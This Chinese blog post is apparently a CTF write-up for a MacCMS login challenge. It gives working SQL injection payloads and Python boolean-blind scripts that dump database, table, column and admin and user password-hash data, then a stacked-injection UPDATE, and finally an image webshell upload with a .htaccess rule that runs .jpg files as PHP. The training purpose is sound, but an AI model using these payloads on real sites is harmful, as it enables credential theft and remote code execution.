<!DOCTYPE html><html lang="zh-cn"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icon.jpg?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icon.jpg?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="根据提示，在这个喜闻乐见的框尝试注入 http:&#x2F;&#x2F;123.57.193.197:12334&#x2F;maccms&#x2F;index.php&#x2F;user&#x2F;login.html ​    经过一些思考和判断，感觉登录失败是用户名对了密码不对，获取失败是用户名都没查到，但是又感觉如果#没过滤，后面都注释了，那为啥万用密码还返回登录失败，这个其实一直不太懂，就卡了一会儿，可能是题目所赐，最后还是用了以下的猜测： ​">
<meta property="og:type" content="article">
<meta property="og:title" content="badmac">
<meta property="og:url" content="http://example.com/2021/11/07/badmac/index.html">
<meta property="og:site_name" content="Biscuit19_">
<meta property="og:description" content="根据提示，在这个喜闻乐见的框尝试注入 http:&#x2F;&#x2F;123.57.193.197:12334&#x2F;maccms&#x2F;index.php&#x2F;user&#x2F;login.html ​    经过一些思考和判断，感觉登录失败是用户名对了密码不对，获取失败是用户名都没查到，但是又感觉如果#没过滤，后面都注释了，那为啥万用密码还返回登录失败，这个其实一直不太懂，就卡了一会儿，可能是题目所赐，最后还是用了以下的猜测： ​">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743214.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743215.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743216.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743217.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743218.png">
<meta property="article:published_time" content="2021-11-07T09:45:27.000Z">
<meta property="article:modified_time" content="2021-11-07T10:36:54.728Z">
<meta property="article:author" content="cuit">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743214.png"><title>badmac | Biscuit19_</title><link ref="canonical" href="http://example.com/2021/11/07/badmac/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"100px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Biscuit19_</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">badmac</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-11-07</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-11-07</span></span></div></header><div class="post-body"><p>根据提示，在这个喜闻乐见的框尝试注入</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://123.57.193.197:12334/maccms/index.php/user/login.html" >http://123.57.193.197:12334/maccms/index.php/user/login.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>​    经过一些思考和判断，感觉登录失败是用户名对了密码不对，获取失败是用户名都没查到，但是又感觉如果#没过滤，后面都注释了，那为啥万用密码还返回登录失败，这个其实一直不太懂，就卡了一会儿，可能是题目所赐，最后还是用了以下的猜测：</p>
<p>​    </p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;code&quot;:1003,&quot;msg&quot;:&quot;用户登录失败&quot;&#125; -》true</span><br><span class="line">&#123;&quot;code&quot;:1003,&quot;msg&quot;:&quot;获取用户信息失败&quot;&#125; -》false</span><br></pre></td></tr></table></div></figure>

<p>#是一定要加的，因为#是用来屏蔽后面那句password查询的，一开始还想过两句sql分别执行的情况，但是可能还是我想多了</p>

        <h2 id="1-判断引号闭合"   >
          <a href="#1-判断引号闭合" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-判断引号闭合" class="headerlink" title="1.判断引号闭合"></a>1.判断引号闭合</h2>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">user_name=&#x27; or 1=1 # -》true</span><br><span class="line">&amp;user_pwd=&#x27;</span><br><span class="line"></span><br><span class="line">user_name=&quot; or 1=1 # -》false</span><br><span class="line">&amp;user_pwd=&#x27;</span><br><span class="line">所以是单引号闭合</span><br></pre></td></tr></table></div></figure>


        <h2 id="2-判断布尔注入："   >
          <a href="#2-判断布尔注入：" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-判断布尔注入：" class="headerlink" title="2.判断布尔注入："></a>2.判断布尔注入：</h2>
      <p>注意：这里就不能用and了，因为前面已经是false了</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">user_name=&#x27; or 1=1 #  -》true</span><br><span class="line">&amp;user_pwd=&#x27;</span><br><span class="line">user_name=&#x27; or 1=2 #  -》false</span><br><span class="line">&amp;user_pwd=&#x27;</span><br></pre></td></tr></table></div></figure>


        <h2 id="3-爆数据库名："   >
          <a href="#3-爆数据库名：" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-爆数据库名：" class="headerlink" title="3.爆数据库名："></a>3.爆数据库名：</h2>
      <p>这里使用python写脚本</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">base = <span class="string">&#x27;http://localhost:8090/maccms/index.php/user/login.html&#x27;</span></span><br><span class="line">query = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="comment">#爆数据库名:</span></span><br><span class="line"><span class="keyword">for</span> position <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">10</span>):<span class="comment">#表示要查的内容中的第几个字符</span></span><br><span class="line">	ifdone = <span class="number">1</span> <span class="comment">#判断到没到所查字段的长度</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> names:</span><br><span class="line">		query = <span class="string">&quot;&#x27; or ((select substring(database(),%d,1))=&#x27;%c&#x27;) #&quot;</span> % (position, i)</span><br><span class="line">		data = &#123;<span class="string">&quot;user_name&quot;</span>: query, <span class="string">&quot;user_pwd&quot;</span>: <span class="string">&quot;&#x27;&quot;</span>&#125;<span class="comment">#注意,query要先赋值再传进data,不然不能动态赋值的,因为不是引用.</span></span><br><span class="line">		req = requests.post(url=base,data=data)</span><br><span class="line">		<span class="comment"># print(data)</span></span><br><span class="line">		<span class="comment"># print(req.text)</span></span><br><span class="line">		<span class="keyword">if</span> req.text.count(<span class="string">&#x27;用户登录失败&#x27;</span>) == <span class="number">1</span>:</span><br><span class="line">			<span class="built_in">print</span>(i,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">			ifdone = <span class="number">0</span></span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">	<span class="keyword">if</span> ifdone == <span class="number">1</span>:<span class="comment">#如果done=1,说明这轮循环没有字符匹配,则表明爆出了全名</span></span><br><span class="line">		<span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743214.png" alt="image-20211103223237871">数据库名</p>
<p>同理得到user：TSCTFJ</p>

        <h2 id="4-爆表名"   >
          <a href="#4-爆表名" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-爆表名" class="headerlink" title="4.爆表名"></a>4.爆表名</h2>
      <p>同理：</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> colunms <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">20</span>):<span class="comment">#表示要查的内容中的第几个字段</span></span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot; 第&quot;</span>+colunms.__str__()+<span class="string">&quot;个字段&quot;</span>,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">   <span class="keyword">for</span> position <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">10</span>):<span class="comment">#表示要查的内容中的第几个字符</span></span><br><span class="line">      ifdone = <span class="number">1</span> <span class="comment">#判断到没到所查字段的长度</span></span><br><span class="line">      <span class="keyword">for</span> i <span class="keyword">in</span> names:<span class="comment">#遍历字符</span></span><br><span class="line">         query = <span class="string">&quot;&#x27; or ((select substring(table_name,%d,1) from information_schema.tables where table_schema=&#x27;maccms&#x27; LIMIT %d,1)=&#x27;%c&#x27;) #&quot;</span> % (position,colunms,i)</span><br><span class="line">         data = &#123;<span class="string">&quot;user_name&quot;</span>: query, <span class="string">&quot;user_pwd&quot;</span>: <span class="string">&quot;&#x27;&quot;</span>&#125;<span class="comment">#注意,query要先赋值再传进data,不然不能动态赋值的,因为不是引用.</span></span><br><span class="line">         <span class="comment"># print(data)</span></span><br><span class="line">         req = requests.post(url=base,data=data)</span><br><span class="line">         <span class="comment"># print(req.text)</span></span><br><span class="line">         <span class="keyword">if</span> req.text.count(<span class="string">&#x27;用户登录失败&#x27;</span>) == <span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(i,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">            ifdone = <span class="number">0</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">      <span class="keyword">if</span> ifdone == <span class="number">1</span>:<span class="comment">#如果done=1,说明这轮循环没有字符匹配,则表明爆出了全名</span></span><br><span class="line">         <span class="keyword">break</span></span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot; 第&quot;</span>+colunms.__str__()+<span class="string">&quot;个字段完毕&quot;</span>)</span><br><span class="line"></span><br><span class="line"> 第<span class="number">0</span>个字段tsctfj_actor 第<span class="number">0</span>个字段完毕</span><br><span class="line"> 第<span class="number">1</span>个字段tsctfj_admin 第<span class="number">1</span>个字段完毕</span><br><span class="line"> 第<span class="number">2</span>个字段tsctfj_annex 第<span class="number">2</span>个字段完毕</span><br><span class="line"> 第<span class="number">3</span>个字段tsctfj_art 第<span class="number">3</span>个字段完毕</span><br><span class="line"> 第<span class="number">4</span>个字段tsctfj_card 第<span class="number">4</span>个字段完毕</span><br><span class="line"> 第<span class="number">5</span>个字段tsctfj_cash 第<span class="number">5</span>个字段完毕</span><br><span class="line"> 第<span class="number">6</span>个字段tsctfj_cj_content 第<span class="number">6</span>个字段完毕</span><br><span class="line"> 第<span class="number">7</span>个字段tsctfj_cj_history 第<span class="number">7</span>个字段完毕</span><br><span class="line"> 第<span class="number">8</span>个字段tsctfj_cj_node 第<span class="number">8</span>个字段完毕</span><br><span class="line"> 第<span class="number">9</span>个字段tsctfj_collect 第<span class="number">9</span>个字段完毕</span><br><span class="line"> 第<span class="number">10</span>个字段tsctfj_comment 第<span class="number">10</span>个字段完毕</span><br><span class="line"> 第<span class="number">11</span>个字段tsctfj_gbook 第<span class="number">11</span>个字段完毕</span><br><span class="line"> 第<span class="number">12</span>个字段tsctfj_group 第<span class="number">12</span>个字段完毕</span><br><span class="line"> 第<span class="number">13</span>个字段tsctfj_link 第<span class="number">13</span>个字段完毕</span><br><span class="line"> 第<span class="number">14</span>个字段tsctfj_msg 第<span class="number">14</span>个字段完毕</span><br><span class="line"> 第<span class="number">15</span>个字段tsctfj_order 第<span class="number">15</span>个字段完毕</span><br><span class="line"> 第<span class="number">16</span>个字段tsctfj_plog 第<span class="number">16</span>个字段完毕</span><br><span class="line"> 第<span class="number">17</span>个字段tsctfj_role 第<span class="number">17</span>个字段完毕</span><br><span class="line"> 第<span class="number">18</span>个字段tsctfj_topic 第<span class="number">18</span>个字段完毕</span><br><span class="line"> 第<span class="number">19</span>个字段tsctfj_type 第<span class="number">19</span>个字段完毕</span><br><span class="line"> 第<span class="number">20</span>个字段tsctfj_ulog 第<span class="number">20</span>个字段完毕</span><br><span class="line"> 第<span class="number">21</span>个字段tsctfj_user 第<span class="number">21</span>个字段完毕</span><br><span class="line"> 第<span class="number">22</span>个字段tsctfj_visit 第<span class="number">22</span>个字段完毕</span><br><span class="line"> 第<span class="number">23</span>个字段tsctfj_vod 第<span class="number">23</span>个字段完毕</span><br><span class="line"> 第<span class="number">24</span>个字段tsctfj_website 第<span class="number">24</span>个字段完毕</span><br></pre></td></tr></table></div></figure>


        <h2 id="5-爆表里的字段"   >
          <a href="#5-爆表里的字段" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-爆表里的字段" class="headerlink" title="5.爆表里的字段"></a>5.爆表里的字段</h2>
      <p>我们先看一下admin表</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#爆表里的字段名(用information_schema.columns)</span></span><br><span class="line"><span class="keyword">for</span> colunms <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">10</span>):<span class="comment">#表示要查的内容中的第几个字段</span></span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot; 第&quot;</span>+colunms.__str__()+<span class="string">&quot;个字段&quot;</span>,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">	<span class="keyword">for</span> position <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">100</span>):<span class="comment">#表示要查的内容中的第几个字符</span></span><br><span class="line">		ifdone = <span class="number">1</span> <span class="comment">#判断到没到所查字段的长度</span></span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> names:<span class="comment">#遍历字符</span></span><br><span class="line">			query = <span class="string">&quot;&#x27; or ((select substring(COLUMN_NAME,%d,1) from information_schema.columns where table_name=&#x27;tsctfj_admin&#x27;and table_schema=&#x27;maccms&#x27; LIMIT %d,1)=&#x27;%c&#x27;) #&quot;</span> % (position,colunms,i)</span><br><span class="line">			data = &#123;<span class="string">&quot;user_name&quot;</span>: query, <span class="string">&quot;user_pwd&quot;</span>: <span class="string">&quot;&#x27;&quot;</span>&#125;<span class="comment">#注意,query要先赋值再传进data,不然不能动态赋值的,因为不是引用.</span></span><br><span class="line">			<span class="comment"># print(data)</span></span><br><span class="line">			req = requests.post(url=base,data=data)</span><br><span class="line">			<span class="comment"># print(req.text)</span></span><br><span class="line">			<span class="keyword">if</span> req.text.count(<span class="string">&#x27;用户登录失败&#x27;</span>) == <span class="number">1</span>:</span><br><span class="line">				<span class="built_in">print</span>(i,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">				ifdone = <span class="number">0</span></span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">		<span class="keyword">if</span> ifdone == <span class="number">1</span>:<span class="comment">#如果done=1,说明这轮循环没有字符匹配,则表明爆出了全名</span></span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot; 第&quot;</span>+colunms.__str__()+<span class="string">&quot;个字段完毕&quot;</span>)</span><br><span class="line">    </span><br><span class="line"> 第<span class="number">0</span>个字段ADMIN_AUTH 第<span class="number">0</span>个字段完毕</span><br><span class="line"> 第<span class="number">1</span>个字段ADMIN_ID 第<span class="number">1</span>个字段完毕</span><br><span class="line"> 第<span class="number">2</span>个字段ADMIN_LAST_LOGIN_IP 第<span class="number">2</span>个字段完毕</span><br><span class="line"> 第<span class="number">3</span>个字段ADMIN_LAST_LOGIN_TIME 第<span class="number">3</span>个字段完毕</span><br><span class="line"> 第<span class="number">4</span>个字段ADMIN_LOGIN_IP 第<span class="number">4</span>个字段完毕</span><br><span class="line"> 第<span class="number">5</span>个字段ADMIN_LOGIN_NUM 第<span class="number">5</span>个字段完毕</span><br><span class="line"> 第<span class="number">6</span>个字段ADMIN_LOGIN_TIME 第<span class="number">6</span>个字段完毕</span><br><span class="line"> 第<span class="number">7</span>个字段ADMIN_NAME 第<span class="number">7</span>个字段完毕</span><br><span class="line"> 第<span class="number">8</span>个字段ADMIN_PWD 第<span class="number">8</span>个字段完毕</span><br><span class="line"> 第<span class="number">9</span>个字段ADMIN_RANDOM 第<span class="number">9</span>个字段完毕</span><br><span class="line"> 第<span class="number">10</span>个字段ADMIN_STATUS 第<span class="number">10</span>个字段完毕</span><br></pre></td></tr></table></div></figure>




        <h2 id="6-爆数据"   >
          <a href="#6-爆数据" class="heading-link"><i class="fas fa-link"></i></a><a href="#6-爆数据" class="headerlink" title="6.爆数据"></a>6.爆数据</h2>
      <figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 爆表信息</span></span><br><span class="line"><span class="keyword">for</span> colunms <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">2</span>):<span class="comment">#表示要查的内容中的第几个字段</span></span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot; 第&quot;</span>+colunms.__str__()+<span class="string">&quot;个字段&quot;</span>,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">	<span class="keyword">for</span> position <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">100</span>):<span class="comment">#表示要查的内容中的第几个字符</span></span><br><span class="line">		ifdone = <span class="number">1</span> <span class="comment">#判断到没到所查字段的长度</span></span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> name:<span class="comment">#注意! 一定要用name数组,这里的字符更全.</span></span><br><span class="line">			query = <span class="string">&quot;&#x27; or ((select substring(GROUP_CONCAT(concat_ws(&#x27;,&#x27;,ADMIN_ID,ADMIN_NAME,ADMIN_PWD)),%d,1) FROM maccms.tsctfj_admin LIMIT %d,1)=&#x27;%c&#x27;) #&quot;</span> % (position,colunms,i)</span><br><span class="line">			<span class="comment"># !注意,上面这句如果要一次性把所有字段都输出,那就不能加逗号,因为逗号也会参与判断,而我们的names数组里没有逗号.</span></span><br><span class="line">			data = &#123;<span class="string">&quot;user_name&quot;</span>: query, <span class="string">&quot;user_pwd&quot;</span>: <span class="string">&quot;&#x27;&quot;</span>&#125;<span class="comment">#注意,query要先赋值再传进data,不然不能动态赋值的,因为不是引用.</span></span><br><span class="line">			<span class="comment"># print(data)</span></span><br><span class="line">			req = requests.post(url=base,data=data)</span><br><span class="line">			<span class="comment"># print(req.text)</span></span><br><span class="line">			<span class="keyword">if</span> req.text.count(<span class="string">&#x27;用户登录失败&#x27;</span>) == <span class="number">1</span>:</span><br><span class="line">				<span class="built_in">print</span>(i,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">				ifdone = <span class="number">0</span></span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">		<span class="keyword">if</span> ifdone == <span class="number">1</span>:<span class="comment">#如果done=1,说明这轮循环没有字符匹配,则表明爆出了全名</span></span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot; 第&quot;</span>+colunms.__str__()+<span class="string">&quot;个字段完毕&quot;</span>)</span><br><span class="line">    </span><br><span class="line">第<span class="number">0</span>个字段<span class="number">1</span><span class="string">&#x27;admin&#x27;</span>cbff36039c3d0212b3e34c23dcde1456<span class="string">&#x27;&#x27;&#x27;&#x27;&#x27;&#x27;</span><span class="string">&#x27;&#x27;</span></span><br></pre></td></tr></table></div></figure>

<p>这里我没懂为什么一直爆分号…我的分隔符明明是，号</p>
<p>发现admin登不上去，再试一下user</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">USER_NAME,USER_PWD</span><br><span class="line">-》</span><br><span class="line">atestuserintsctf&#x27;j</span><br><span class="line">6568617824e8e70b6ca0a5e6327c873d</span><br><span class="line"></span><br><span class="line">第0个字段atestuserintsctf-j 6568617824e8e70b6ca0a5e6327c873d</span><br></pre></td></tr></table></div></figure>

<p>用户登录成功，登录之后</p>

        <h2 id="7-堆叠注入"   >
          <a href="#7-堆叠注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#7-堆叠注入" class="headerlink" title="7.堆叠注入"></a>7.堆叠注入</h2>
      <p>登录进去发现积分只有1，没法支付之前那个功能体验，根据提示要去充值，然后去查了一下card表和cash表好像是空表，所以可能自己的积分改不了，那就改需要的积分</p>
<p>判断堆叠注入：</p>
<p>在用户名处构造：</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">atestuserintsctf<span class="operator">-</span>j;<span class="keyword">CREATE</span> <span class="keyword">TABLE</span> aaainject(id <span class="type">int</span>);#</span><br></pre></td></tr></table></div></figure>

<p>然后重新查询表，发现多了一张表，所以有堆叠注入，又因为那个页面的url带着art，所以我们查询art的表，查到了ART_POINTS_DETAIL和ART_POINTS，我们发现它就是那个积分值，把他们改成1，</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">update tsctfj_art <span class="keyword">set</span> ART_POINTS_DETAIL <span class="operator">=</span> <span class="number">1</span> <span class="keyword">where</span> ART_POINTS_DETAIL <span class="operator">=</span> <span class="number">4294967295</span></span><br></pre></td></tr></table></div></figure>

<p>然后我们就进入成功啦</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743215.png" alt="image-20211105000320009"></p>
<p>后来发现我就1积分，于是又去数据库里发现user里的userpoint是积分，改多了。</p>

        <h2 id="8-图片上传"   >
          <a href="#8-图片上传" class="heading-link"><i class="fas fa-link"></i></a><a href="#8-图片上传" class="headerlink" title="8.图片上传"></a>8.图片上传</h2>
      <p>要get传暗号?tsctf-j_2021_zbr_666=666_rbz_1202_j-ftcst</p>
<p>因为是要开传图片的功能，所以这个get应该是往送图片的请求的加，一开始加到页面上没有用 果然还是太笨惹</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743216.png" alt="image-20211105002635107"></p>
<p>在url之后加参数，好像直接就会变成get请求，可能是burpsuite帮我做的或者就是如此</p>
<p>既然明示了图片上传,那就用图片马吧,用copy命令拼接图片马,然后把图片上传, 发现上传成功.</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743217.png" alt="image-20211107152347868"></p>
<p>但是此时用蚁剑是连不上的,因为图片仍然被图片格式所解析,无法执行php命令.</p>
<p>所以我们再上传一个.htaccess文件, 这是apache的配置文件,它作用于本目录和所有子目录, 我们上传这样的配置规则:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;\.jpg&quot;&gt;SetHandler application/x-httpd-php  &lt;/FilesMatch&gt;</span><br></pre></td></tr></table></div></figure>

<p>表示后缀为.jpg的都会被解析为php，这里对htaccess文件类型没有限制，所以上传成功，最后用蚁剑连接成功：</p>
<p><img src="https://raw.githubusercontent.com/Biscuit19/PicGo/main/img/202111071743218.png" alt="image-20211107152310873"></p>
<p>最后终于连接成功,找到了flag</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://example.com">cuit</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://example.com/2021/11/07/badmac/">http://example.com/2021/11/07/badmac/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/11/16/LFI-to-RCE/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">LFI_to_RCE</span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" 